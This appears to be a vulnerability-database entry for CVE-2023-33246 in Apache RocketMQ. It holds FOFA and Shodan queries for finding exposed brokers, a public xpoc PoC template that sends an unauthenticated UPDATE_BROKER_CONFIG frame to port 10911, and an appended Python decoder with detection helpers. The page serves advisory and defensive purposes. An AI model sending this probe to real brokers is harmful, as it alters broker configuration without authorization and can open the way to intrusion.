CVE-2023-33246: RocketMQ broker unauthorized

Date: 2025-09-01 | Affected software: RocketMQ | PoC: public

Vulnerability description

Unauthenticated access to Apache RocketMQ was detected. Search queries: FOFA: protocol="rocketmq" SHODAN: title:"RocketMQ"

PoC code [public]

id: CVE-2023-33246

info:
  name: RocketMQ broker unauthorized
  author: xpoc,j4vaovo
  severity: critical
  verified: true
  description: |
    Unauthenticated access to Apache RocketMQ was detected.
    FOFA: protocol="rocketmq"
    SHODAN: title:"RocketMQ"
  reference:
    - https://stack.chaitin.com/techblog/detail/104
    - https://rocketmq.apache.org/docs/bestPractice/03access
    - https://github.com/SuperZero/CVE-2023-33246
  tags: network,rocketmq,broker,apache,unauth
  created: 2023/06/22

set:
  hostname: request.url.host
  host: request.url.domain
  payload: base64Decode('AAAAyQAAALF7ImNvZGUiOjI1LCJleHRGaWVsZHMiOnsiQWNjZXNzS2V5Ijoicm9ja2V0bXEyIiwiU2lnbmF0dXJlIjoiK3pkUmRVdWF6aVNRa0hVVXFkcnR3ZzFGOGprPSJ9LCJmbGFnIjowLCJsYW5ndWFnZSI6IkpBVkEiLCJvcGFxdWUiOjAsInNlcmlhbGl6ZVR5cGVDdXJyZW50UlBDIjoiSlNPTiIsInZlcnNpb24iOjQzM310ZXN0X2tleT10ZXN0X3ZhbHVlCg==')
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
  r1:
    request:
      type: tcp
      host: "{{host}}:10911"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
expression: r0() || r1()
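As an added example (not part of the page or of the xpoc template above), the following Python decodes the template's base64 payload into its RocketMQ remoting frame (length prefix, JSON header, body) and shows the two checks a defender wants: recognising an UPDATE_BROKER_CONFIG request on the wire, and recognising the broker's code 0 response that the template treats as success. The frame layout and request codes 25/26 follow RocketMQ's RemotingCommand and RequestCode classes; the constructed response frame in the test is an assumption built with the same helper.

```python
import base64
import json
import struct

# The PoC template's own payload (copied from the page): base64 of one raw remoting frame.
POC_PAYLOAD_B64 = "AAAAyQAAALF7ImNvZGUiOjI1LCJleHRGaWVsZHMiOnsiQWNjZXNzS2V5Ijoicm9ja2V0bXEyIiwiU2lnbmF0dXJlIjoiK3pkUmRVdWF6aVNRa0hVVXFkcnR3ZzFGOGprPSJ9LCJmbGFnIjowLCJsYW5ndWFnZSI6IkpBVkEiLCJvcGFxdWUiOjAsInNlcmlhbGl6ZVR5cGVDdXJyZW50UlBDIjoiSlNPTiIsInZlcnNpb24iOjQzM310ZXN0X2tleT10ZXN0X3ZhbHVlCg=="
POC_FRAME = base64.b64decode(POC_PAYLOAD_B64)

# Request codes from RocketMQ's RequestCode class; 25 is the command the PoC frame carries.
REQUEST_CODE_NAMES = {25: "UPDATE_BROKER_CONFIG", 26: "GET_BROKER_CONFIG"}


def parse_frame(raw: bytes) -> dict:
    """Split a remoting frame: 4-byte total length (excluding itself), then 4 bytes whose high
    byte is the serialize type (0 = JSON) and low 3 bytes the header length, then header, then body."""
    if len(raw) < 8:
        raise ValueError("frame too short")
    total_len, ori_header_len = struct.unpack(">II", raw[:8])
    if total_len + 4 != len(raw):
        raise ValueError(f"length field {total_len} does not match {len(raw) - 4} payload bytes")
    serialize_type, header_len = ori_header_len >> 24, ori_header_len & 0x00FFFFFF
    if serialize_type != 0:
        raise ValueError("only JSON-serialized headers are decoded here")
    return {"header": json.loads(raw[8:8 + header_len]), "body": raw[8 + header_len:]}


def build_frame(header: dict, body: bytes) -> bytes:
    """Inverse of parse_frame for JSON headers (sorted keys, no whitespace, as in the PoC frame)."""
    hdr = json.dumps(header, separators=(",", ":"), sort_keys=True).encode()
    return struct.pack(">II", 4 + len(hdr) + len(body), len(hdr)) + hdr + body


def is_response(header: dict) -> bool:
    """Bit 0 of 'flag' is RocketMQ's RPC_TYPE bit: set on responses, clear on requests."""
    return bool(header.get("flag", 0) & 1)


def describe_request(raw: bytes) -> str:
    """Detection-style summary of a captured frame, naming admin commands such as UPDATE_BROKER_CONFIG."""
    frame = parse_frame(raw)
    header = frame["header"]
    kind = "response" if is_response(header) else "request"
    name = REQUEST_CODE_NAMES.get(header.get("code"), f"code {header.get('code')}")
    access_key = header.get("extFields", {}).get("AccessKey")
    return f"{kind} {name} AccessKey={access_key!r} body={frame['body']!r}"


def is_accepted_response(raw: bytes) -> bool:
    """The template's success condition: a response frame whose header code is 0 (SUCCESS)."""
    header = parse_frame(raw)["header"]
    return is_response(header) and header.get("code") == 0


if __name__ == "__main__":
    print(describe_request(POC_FRAME))
```

Run stand-alone it prints the decoded request; in a sensor, feeding `describe_request` every frame seen on 10911 surfaces config-update commands from unexpected clients.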
